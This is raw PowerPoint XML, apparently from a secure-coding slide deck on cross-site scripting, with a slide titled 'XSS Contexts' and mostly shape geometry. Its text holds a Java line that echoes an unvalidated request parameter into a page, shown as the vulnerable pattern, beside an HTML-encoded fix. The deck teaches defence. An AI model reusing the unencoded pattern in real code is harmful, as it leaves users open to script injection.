              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>out.println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("Your email address is: " +  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Encoder.HtmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(email));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>	//log &amp; throw a specific validation exception and fail safely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1370570" y="1367894"/>
            <a:ext cx="6396005" cy="1491795"/>
            <a:chOff x="1370570" y="1367894"/>
            <a:chExt cx="6396005" cy="1491795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Down Arrow 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1370571" y="1367894"/>
              <a:ext cx="6396004" cy="1491795"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 81134"/>
                <a:gd name="adj2" fmla="val 51837"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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1370570" y="1468394"/>
              <a:ext cx="6396005" cy="723275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>String email = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>request.getParameter</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>("email");</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>out.println</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>("Your email address is: " + email);</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2112806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XSS Contexts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Group 61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="625059" y="699501"/>
            <a:ext cx="7801464" cy="4076408"/>
            <a:chOff x="273395" y="483659"/>
            <a:chExt cx="8648657" cy="4519082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1193527" y="964750"/>
              <a:ext cx="6690803" cy="4030886"/>
              <a:chOff x="975987" y="1390937"/>
              <a:chExt cx="6690803" cy="4030886"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="TextBox 34"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2222429" y="1390937"/>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6" name="TextBox 35"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5726576" y="1390937"/>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7" name="TextBox 36"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4374304" y="1967091"/>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8" name="TextBox 37"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="975987" y="232103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39" name="TextBox 38"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7219953" y="232103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40" name="TextBox 39"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4835842" y="261499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41" name="TextBox 40"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2986757" y="2614994"/>
                <a:ext cx="446837" cy="707886"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="4000" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>X</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="TextBox 41"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="975987" y="3499250"/>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3" name="TextBox 42"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3139620" y="3499250"/>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4" name="TextBox 43"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7114122" y="3652108"/>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5" name="TextBox 44"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6696682" y="4171862"/>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6" name="TextBox 45"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4150885" y="4359994"/>
                <a:ext cx="446837" cy="707886"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="4000" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>O</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="TextBox 46"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3633493" y="4713937"/>
                <a:ext cx="446837" cy="707886"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="4000" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>O</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48" name="Group 47"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="273395" y="483659"/>
              <a:ext cx="8648657" cy="4519082"/>
              <a:chOff x="49975" y="1126475"/>
              <a:chExt cx="8648657" cy="4519082"/>
            </a:xfrm>
            <a:noFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Rectangle 48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3762842" y="3652108"/>
                <a:ext cx="333939" cy="333939"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="20000"/>
                  </a:srgb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1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1252321" y="1126475"/>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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4821141" y="1126475"/>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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="49975" y="2143539"/>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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6293941" y="2143539"/>
                <a:ext cx="2404691" cy="123704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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4303751" y="2719693"/>
                <a:ext cx="1552172" cy="82427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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2454666" y="2719693"/>
                <a:ext cx="1552172" cy="824273"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11686 w 20656"/>
                  <a:gd name="T1" fmla="*/ 281 h 5937"/>
                  <a:gd name="T2" fmla="*/ 11686 w 20656"/>
                  <a:gd name="T3" fmla="*/ 281 h 5937"/>
                  <a:gd name="T4" fmla="*/ 0 w 20656"/>
                  <a:gd name="T5" fmla="*/ 3311 h 5937"/>
                  <a:gd name="T6" fmla="*/ 11624 w 20656"/>
                  <a:gd name="T7" fmla="*/ 5780 h 5937"/>
                  <a:gd name="T8" fmla="*/ 20655 w 20656"/>
                  <a:gd name="T9" fmla="*/ 3218 h 5937"/>
                  <a:gd name="T10" fmla="*/ 8344 w 20656"/>
                  <a:gd name="T11" fmla="*/ 812 h 5937"/>
                  <a:gd name="connsiteX0" fmla="*/ 5657 w 10000"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 9336"/>
                  <a:gd name="connsiteX1" fmla="*/ 5657 w 10000"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 9336"/>
                  <a:gd name="connsiteX2" fmla="*/ 0 w 10000"/>
                  <a:gd name="connsiteY2" fmla="*/ 5104 h 9336"/>
                  <a:gd name="connsiteX3" fmla="*/ 5627 w 10000"/>
                  <a:gd name="connsiteY3" fmla="*/ 9263 h 9336"/>
                  <a:gd name="connsiteX4" fmla="*/ 10000 w 10000"/>
                  <a:gd name="connsiteY4" fmla="*/ 4947 h 9336"/>
                  <a:gd name="connsiteX5" fmla="*/ 3905 w 10000"/>
                  <a:gd name="connsiteY5" fmla="*/ 1483 h 9336"/>
                  <a:gd name="connsiteX0" fmla="*/ 5253 w 9596"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 9941"/>
                  <a:gd name="connsiteX1" fmla="*/ 5253 w 9596"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 9941"/>
                  <a:gd name="connsiteX2" fmla="*/ 0 w 9596"/>
                  <a:gd name="connsiteY2" fmla="*/ 5546 h 9941"/>
                  <a:gd name="connsiteX3" fmla="*/ 5223 w 9596"/>
                  <a:gd name="connsiteY3" fmla="*/ 9922 h 9941"/>
                  <a:gd name="connsiteX4" fmla="*/ 9596 w 9596"/>
                  <a:gd name="connsiteY4" fmla="*/ 5299 h 9941"/>
                  <a:gd name="connsiteX5" fmla="*/ 3501 w 9596"/>
                  <a:gd name="connsiteY5" fmla="*/ 1588 h 9941"/>
                  <a:gd name="connsiteX0" fmla="*/ 5474 w 9860"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                  <a:gd name="connsiteX1" fmla="*/ 5474 w 9860"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                  <a:gd name="connsiteX2" fmla="*/ 0 w 9860"/>
                  <a:gd name="connsiteY2" fmla="*/ 5579 h 10000"/>
                  <a:gd name="connsiteX3" fmla="*/ 5443 w 9860"/>
                  <a:gd name="connsiteY3" fmla="*/ 9981 h 10000"/>
                  <a:gd name="connsiteX4" fmla="*/ 9860 w 9860"/>
                  <a:gd name="connsiteY4" fmla="*/ 5330 h 10000"/>
                  <a:gd name="connsiteX5" fmla="*/ 3648 w 9860"/>
                  <a:gd name="connsiteY5" fmla="*/ 1597 h 10000"/>
                  <a:gd name="connsiteX0" fmla="*/ 5552 w 10000"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 9982"/>
                  <a:gd name="connsiteX1" fmla="*/ 5552 w 10000"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 9982"/>
                  <a:gd name="connsiteX2" fmla="*/ 0 w 10000"/>
                  <a:gd name="connsiteY2" fmla="*/ 5579 h 9982"/>
                  <a:gd name="connsiteX3" fmla="*/ 5520 w 10000"/>
                  <a:gd name="connsiteY3" fmla="*/ 9981 h 9982"/>
                  <a:gd name="connsiteX4" fmla="*/ 10000 w 10000"/>
                  <a:gd name="connsiteY4" fmla="*/ 5330 h 9982"/>
                  <a:gd name="connsiteX5" fmla="*/ 3700 w 10000"/>
                  <a:gd name="connsiteY5" fmla="*/ 1597 h 9982"/>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 name="connsiteX0" fmla="*/ 5552 w 10000"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                  <a:gd name="connsiteX1" fmla="*/ 5552 w 10000"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                  <a:gd name="connsiteX2" fmla="*/ 0 w 10000"/>
                  <a:gd name="connsiteY2" fmla="*/ 5589 h 10000"/>
                  <a:gd name="connsiteX3" fmla="*/ 5520 w 10000"/>
                  <a:gd name="connsiteY3" fmla="*/ 9999 h 10000"/>
                  <a:gd name="connsiteX4" fmla="*/ 10000 w 10000"/>
                  <a:gd name="connsiteY4" fmla="*/ 5340 h 10000"/>
                  <a:gd name="connsiteX5" fmla="*/ 3700 w 10000"/>
                  <a:gd name="connsiteY5" fmla="*/ 1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5552" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5552" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3666" y="0"/>
                      <a:pt x="-49" y="1483"/>
                      <a:pt x="0" y="5589"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="9695"/>
                      <a:pt x="4392" y="9945"/>
                      <a:pt x="5520" y="9999"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6648" y="10053"/>
                      <a:pt x="10000" y="8806"/>
                      <a:pt x="10000" y="5340"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10000" y="1591"/>
                      <a:pt x="5394" y="124"/>
                      <a:pt x="3700" y="1600"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:grpFill/>
              <a:ln w="38100" cap="rnd" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="20000"/>
                  </a:srgbClr>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Freeform 55"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3927466" y="2243509"/>
                <a:ext cx="364526" cy="1446265"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 364526"/>
                  <a:gd name="connsiteY0" fmla="*/ 1446265 h 1446265"/>
                  <a:gd name="connsiteX1" fmla="*/ 235178 w 364526"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 1446265"/>
                  <a:gd name="connsiteX2" fmla="*/ 364526 w 364526"/>
                  <a:gd name="connsiteY2" fmla="*/ 399781 h 1446265"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="364526" h="1446265">
                    <a:moveTo>
                      <a:pt x="0" y="1446265"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="235178" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364526" y="399781"/>
                    </a:ln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5797128" y="2490432"/>
                <a:ext cx="1599208" cy="1399232"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1599208 w 1599208"/>
                  <a:gd name="connsiteY0" fmla="*/ 1399232 h 1399232"/>
                  <a:gd name="connsiteX1" fmla="*/ 0 w 1599208"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 1399232"/>
                  <a:gd name="connsiteX2" fmla="*/ 35277 w 1599208"/>
                  <a:gd name="connsiteY2" fmla="*/ 399781 h 1399232"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1599208" h="1399232">
                    <a:moveTo>
                      <a:pt x="1599208" y="1399232"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35277" y="399781"/>
                    </a:ln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456616" y="4030763"/>
                <a:ext cx="1575690" cy="564396"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1575690 w 1575690"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 564396"/>
                  <a:gd name="connsiteX1" fmla="*/ 658497 w 1575690"/>
                  <a:gd name="connsiteY1" fmla="*/ 70550 h 564396"/>
                  <a:gd name="connsiteX2" fmla="*/ 258695 w 1575690"/>
                  <a:gd name="connsiteY2" fmla="*/ 235165 h 564396"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 1575690"/>
                  <a:gd name="connsiteY3" fmla="*/ 564396 h 564396"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX3" y="connsiteY3"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1575690" h="564396">
                    <a:moveTo>
                      <a:pt x="1575690" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1226843" y="15678"/>
                      <a:pt x="877996" y="31356"/>
                      <a:pt x="658497" y="70550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="438998" y="109744"/>
                      <a:pt x="368444" y="152857"/>
                      <a:pt x="258695" y="235165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148945" y="317473"/>
                      <a:pt x="0" y="564396"/>
                      <a:pt x="0" y="564396"/>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1246442" y="2792065"/>
                <a:ext cx="3739324" cy="968258"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 3739324 w 3739324"/>
                  <a:gd name="connsiteY0" fmla="*/ 15840 h 968258"/>
                  <a:gd name="connsiteX1" fmla="*/ 2375294 w 3739324"/>
                  <a:gd name="connsiteY1" fmla="*/ 15840 h 968258"/>
                  <a:gd name="connsiteX2" fmla="*/ 1058299 w 3739324"/>
                  <a:gd name="connsiteY2" fmla="*/ 180455 h 968258"/>
                  <a:gd name="connsiteX3" fmla="*/ 399802 w 3739324"/>
                  <a:gd name="connsiteY3" fmla="*/ 580236 h 968258"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 3739324"/>
                  <a:gd name="connsiteY4" fmla="*/ 968258 h 9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324" h="968258">
                    <a:moveTo>
                      <a:pt x="3739324" y="15840"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3280727" y="2122"/>
                      <a:pt x="2822131" y="-11596"/>
                      <a:pt x="2375294" y="15840"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1928457" y="43276"/>
                      <a:pt x="1387548" y="86389"/>
                      <a:pt x="1058299" y="180455"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="729050" y="274521"/>
                      <a:pt x="576185" y="448935"/>
                      <a:pt x="399802" y="580236"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="223419" y="711537"/>
                      <a:pt x="0" y="968258"/>
                      <a:pt x="0" y="968258"/>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915707" y="5232422"/>
                <a:ext cx="1528655" cy="413135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1528655 w 1528655"/>
                  <a:gd name="connsiteY0" fmla="*/ 223407 h 413135"/>
                  <a:gd name="connsiteX1" fmla="*/ 1246442 w 1528655"/>
                  <a:gd name="connsiteY1" fmla="*/ 352747 h 413135"/>
                  <a:gd name="connsiteX2" fmla="*/ 823122 w 1528655"/>
                  <a:gd name="connsiteY2" fmla="*/ 411539 h 413135"/>
                  <a:gd name="connsiteX3" fmla="*/ 411561 w 1528655"/>
                  <a:gd name="connsiteY3" fmla="*/ 293956 h 413135"/>
                  <a:gd name="connsiteX4" fmla="*/ 82313 w 1528655"/>
                  <a:gd name="connsiteY4" fmla="*/ 94066 h 413135"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 1528655"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 41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655" h="413135">
                    <a:moveTo>
                      <a:pt x="1528655" y="223407"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1446343" y="272399"/>
                      <a:pt x="1364031" y="321392"/>
                      <a:pt x="1246442" y="352747"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1128853" y="384102"/>
                      <a:pt x="962269" y="421338"/>
                      <a:pt x="823122" y="411539"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="683975" y="401741"/>
                      <a:pt x="535029" y="346868"/>
                      <a:pt x="411561" y="293956"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="288093" y="241044"/>
                      <a:pt x="150906" y="143059"/>
                      <a:pt x="82313" y="94066"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13719" y="45073"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>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6949499" y="1585047"/>
                <a:ext cx="1058299" cy="2845497"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1058299 w 1058299"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 2845497"/>
